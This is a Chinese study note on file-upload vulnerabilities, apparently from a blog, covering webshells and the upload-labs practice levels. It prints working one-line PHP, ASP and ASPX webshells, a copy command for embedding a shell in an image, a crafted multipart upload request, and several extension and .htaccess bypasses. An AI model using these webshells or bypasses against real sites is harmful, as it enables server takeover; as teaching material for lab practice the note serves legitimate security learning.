文件上传漏洞(一句话木马)-学习笔记
什么是webshell?
渗webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
一句话木马
概述
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权
限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马:
<?php @eval($_POST['attack']) ?>
【基本原理】
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑(菜刀)即可获取和控制整
个网站目录。@
表示后面即使执行错误,也不报错。 eval()
函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']
表示从页面中获得attack这 个参数值。
控制木马条件
其中,只要攻击者满足三个条件,就能实现成功入侵:
① 木马上传成功,未被杀;
② 知道木马的路径在哪;
③ 上传的木马能正常运行。
常见一句话木马
php: <?php @eval($_POST['pass']);?>
、<?php system($_GET['cmd']);?>
asp: <%eval request ("pass")%>
aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
蚁剑
利用蚁剑高效控制shell
,对服务器进行高 效率渗透
Web体系结构
什么是web容器?
web容器是一种服务程序,在服务器一个端口就有一个提供相应服务的程序,而这个程序就是处理
从客户端发出的请求,如tomcat、apache、nginx等等。(可以理解为给编程语言提供环境)
中间件
提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通。中间件处在操作系统和
更高一级应用程序之间。
什么是文件解析?
当服务器接收到一个HTTP请求的时候,IIS首先需要决定如何去处理这个请求(服务器处理.aspx
和.html
肯定是不一样的),根据的是文件的后缀名。
文件上传漏洞
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚 本或者WebShell等。
PASS-01/02
01是前端js判断是否为图片利用抓包修改文件名
02是判断content-type,于是修改content-type绕过。
PASS-03
不允许上传.asp,.aspx,.php,.jsp后缀文件,利用php3、phtml后缀绕过。
PASS-04_01
利用.htaccess文件,将所有文件解析为php。
PASS-05/06/07/08
05 info.phP
大小写绕过
06 info.php
后缀名中加空格绕过
07 info.php.
后缀加“.”绕过【利用windows特性,会自动去掉后缀名中最后的”.”】
(Linux中无效)
08 info.php::$data
利用这个特性将后缀改为.php::$data
可以直接绕过检查(Linux无效)
PASS-15
- cmd命令:
copy a.jpg /b + shell.php /a webshell.jpg
A. 通过读文件的前2个字节判断文件类型
B. 利用gif头“GIF89a” - 利用.htaccess文件,解析所有类型文件为php
- 上传图片马
------WebKitFormBoundaryPAdYiq2VuZu31amF
Content-Disposition: form-data; name="file"; filename="file.gif"
Content-Type: image/gifGIF89a
<?php phpinfo();?>
------WebKitFormBoundaryPAdYiq2VuZu31amF--
练习网站:
http://upload-labs.f5.ink/Pass-03/index.php
https://xz.aliyun.com/t/2435
文件上传漏洞(一句话木马)-学习笔记相关推荐
- 文件上传漏洞—一句话图片马制作
文件上传漏洞-一句话图片马制作 提要:在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来尝试突破. 简介:在图 ...
- 文件上传漏洞---Web渗透学习
文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件. 这里上传的文件可以是木 ...
- 文件上传漏洞靶场upload-labs学习(pass1-pass5)
Upload-Labs学习 0x00 upload-labs简介 0x01 upload-labs环境搭建 0x02 Pass1(前端判断绕过) 0x03 Pass2(content-type类型绕过 ...
- 文件上传漏洞靶场upload-labs学习(pass11-pass15)
Upload-Labs关卡 0x00 Pass11(str_ireplace复写绕过) 0x01 Pass12(GET方式%00截断) 0x02 Pass13(POST方式%00截断) 0x03 Pa ...
- miniui文件上传 linux,MINIUI grid学习笔记
grid 控件 a.事件的绑定和移除 grid.on("rowclick", fn); //绑定事件 (这个的话类似jquery的绑定事件) grid.un("rowcl ...
- 【EL】【JSTL】【文件上传下载】【学习笔记】寒假javaweb学习之旅1.5
厦工我的厦工
- 网安基础学习之“文件上传漏洞原理与实现”
网安基础学习之"文件上传漏洞原理与实现" 近期新闻头条上报出了"长沙市场监管局网站被上传了黄色页面",经过长沙市公安局网技支队的排查,该门户网站后台编辑器存在* ...
- 农夫安全学习——文件上传漏洞
学习自农夫安全A14 文件上传漏洞 定义 成因 危害 攻击流程 防护和绕过 解析漏洞 问题和思考 后记 定义 由于程序员在对用户文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型或者处理缺 ...
- wmm的学习日记(文件上传漏洞)
这个星期正式学习了一下文件上传漏洞,虽然之前也有接触过这样的题目,但还是云里雾里的感觉.现在应该可以不靠题解完完全全靠自己的脑子做一些简单的题目啦.接下来就让我浅浅总结一下吧. 目录 文件上传漏洞简介 ...
最新文章
- Android 标签 (FlexboxLayout实现标签)
- 上海居民被垃圾分类逼疯!这款垃圾自动分类器也许能帮上忙
- Puppet--用户自动化管理
- 大型网站系统架构演化之路(转)
- html中 alt 和 title 的区别
- WordPress中缠结的自定义数据世界
- mysql_connect 与 memcache_connect
- 带网格的_【我看身边的网格化】申港街道:一人一板穿梭楼宇小巷 一网一格解决百姓问题...
- Win2D 官方文章系列翻译 - DPI (每英寸点数)和 DIPs(设备独立像素)
- 20200726 plecs 元件显示变量名
- 阿里部署edas,采用hsf框架,启动项目时无法启动的问题。
- HI3519 开发交流QQ群
- 3. MySQL之PyMySQL的安装使用
- MacBook 如何在合上盖子后还能继续用外接键盘和显示器工作?
- sklearn-机器学习笔记
- 如何裁剪视频画面?快来看看这个详细教程
- java基于微信小程序的游戏外包管理信息系统 uniapp 小程序
- oracle 停止dbconsole,本地计算机上的OracleDBConsoleorcl服务启动后停止
- Nacos高级特性Raft算法以及原理和源码分析
- android 线性布局总结